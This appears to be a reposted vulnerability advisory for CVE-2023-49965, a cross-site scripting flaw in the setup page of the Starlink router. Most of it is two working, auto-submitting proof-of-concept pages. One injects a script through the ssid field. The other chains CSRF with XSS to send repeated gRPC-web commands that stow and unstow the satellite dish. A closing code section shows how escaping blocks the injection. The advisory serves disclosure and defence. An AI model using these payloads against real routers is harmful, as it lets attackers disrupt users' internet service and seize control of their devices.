CVE-2023-49965: SpaceX Starlink router vulnerability

admin, 28 September 2024, 10:46:24
  • Product: Starlink router, generation 2
  • Tested version: 2022.32.0 (fixed in 2023.48.0 and later)
  • Vulnerability type: XSS (cross-site scripting)


The vulnerability is caused by insufficient filtering of the values submitted to the parameters of the initial setup page (http://192.168.1.1/setup); the proofs of concept below use the ssid and password fields. The submitted value is reflected back into the page unescaped, so a value containing a double quote can close the attribute it lands in and add its own attributes or tags.

<html>
  <body>
    <h1>Proof of Concept</h1>
    <form id="PoC" method="POST" action="http://192.168.1.1/setup">
      <input type="hidden" name="ssid" value='" onfocus=javascript:alert(`XSS`); autofocus="'>
      <!-- <input type="hidden" name="password" value='" onfocus=javascript:alert(`XSS`); autofocus="'> -->
    </form>
    <script type="text/javascript">
      document.addEventListener("DOMContentLoaded", function() {
        document.getElementById("PoC").submit();
      });
    </script>
  </body>
</html>

Exploiting the XSS in combination with CSRF (the injected script calls the dish's gRPC-web API to stow and unstow it):

<html>
  <body>
    <h1>Dishy Stow and Unstow</h1>
    <form id="PoC" method="POST" action="http://192.168.100.1/setup">
      <!-- <input type="hidden" name="ssid" value='" onfocus=javascript:alert(`XSS`); autofocus="'> -->
      <input type="hidden" name="password" value='"><script>
        for (let i = 0; i < 100; i++) {
          setTimeout(() => {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://192.168.100.1:9201/SpaceX.API.Device.Device/Handle", true);
            xhr.setRequestHeader("x-grpc-web", "1");
            xhr.setRequestHeader("Content-Type", "application/grpc-web+proto");
            xhr.onreadystatechange = () => {
              if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); }
            };
            xhr.send(new Uint8Array([0,0,0,0,3,146,125,0]).buffer);
            setTimeout(() => {
              var xhr2 = new XMLHttpRequest();
              xhr2.open("POST", "http://192.168.100.1:9201/SpaceX.API.Device.Device/Handle", true);
              xhr2.setRequestHeader("x-grpc-web", "1");
              xhr2.setRequestHeader("Content-Type", "application/grpc-web+proto");
              xhr2.onreadystatechange = () => {
                if (xhr2.readyState == 4 && xhr2.status == 200) { console.log(xhr2.responseText); }
              };
              xhr2.send(new Uint8Array([0,0,0,0,5,146,125,2,8,1]).buffer);
            }, 1000);
          }, i * 2000);
        }
      </script><input type="hidden'/>
    </form>
    <script type="text/javascript">
      document.addEventListener("DOMContentLoaded", function() {
        document.getElementById("PoC").submit();
      });
    </script>
  </body>
</html>
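The root cause in both PoCs is the same: the submitted field value is written back into a value="" attribute without escaping. The following is an added example, not code from the Starlink firmware or from the original post; it assumes a hypothetical server-side renderer for the setup form and places the unescaped version beside an attribute-escaped one, then checks what a browser would see for the two payload shapes above (the gRPC body is omitted from the constructed password payload).

```javascript
// Hypothetical renderer that reflects the submitted value unescaped,
// reproducing the defect behind CVE-2023-49965 (assumption, not firmware code).
function renderFieldUnsafe(name, submitted) {
  return `<input type="text" name="${name}" value="${submitted}">`;
}

// Hardened renderer: escape the characters that can end an attribute or a tag.
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderFieldSafe(name, submitted) {
  return `<input type="text" name="${name}" value="${escapeHtmlAttr(submitted)}">`;
}

// Reverse of escapeHtmlAttr, to show the stored value survives intact.
function decodeHtmlAttr(s) {
  const map = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#39;": "'" };
  return s.replace(/&(?:amp|lt|gt|quot|#39);/g, (e) => map[e]);
}

// Minimal attribute tokenizer for one start tag (demo only, not a full HTML
// parser): returns {attributeName: value} roughly as a browser would see them.
function parseAttributes(tag) {
  const inner = tag.replace(/^<[a-zA-Z]+\s*/, "").replace(/\s*\/?>$/, "");
  const attrs = {};
  const re = /([^\s=]+)(?:=(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let m;
  while ((m = re.exec(inner)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Number of element start tags in a fragment (how many tags the browser sees).
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed inputs mirroring the two PoC payload shapes above.
const POC_SSID = '" onfocus=javascript:alert(`XSS`); autofocus="';
const POC_PASSWORD = '"><script>alert(`XSS`)</script><input type="hidden\'';

// Unescaped: the ssid value becomes extra onfocus/autofocus attributes, and the
// password value becomes three tags. Escaped: one attribute, one tag.
console.log(Object.keys(parseAttributes(renderFieldUnsafe("ssid", POC_SSID))));
console.log(Object.keys(parseAttributes(renderFieldSafe("ssid", POC_SSID))));
console.log(countStartTags(renderFieldUnsafe("password", POC_PASSWORD)),
            countStartTags(renderFieldSafe("password", POC_PASSWORD)));
```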

Originally published on the WeChat official account 合规渗透: CVE-2023-49965 SpaceX Starlink router vulnerability

Published by admin on 28 September 2024, 10:46:24. Reposts should keep the link to this article (CN-SEC Chinese site, with thanks to the original author): https://cn-sec.com/archives/3103725.html
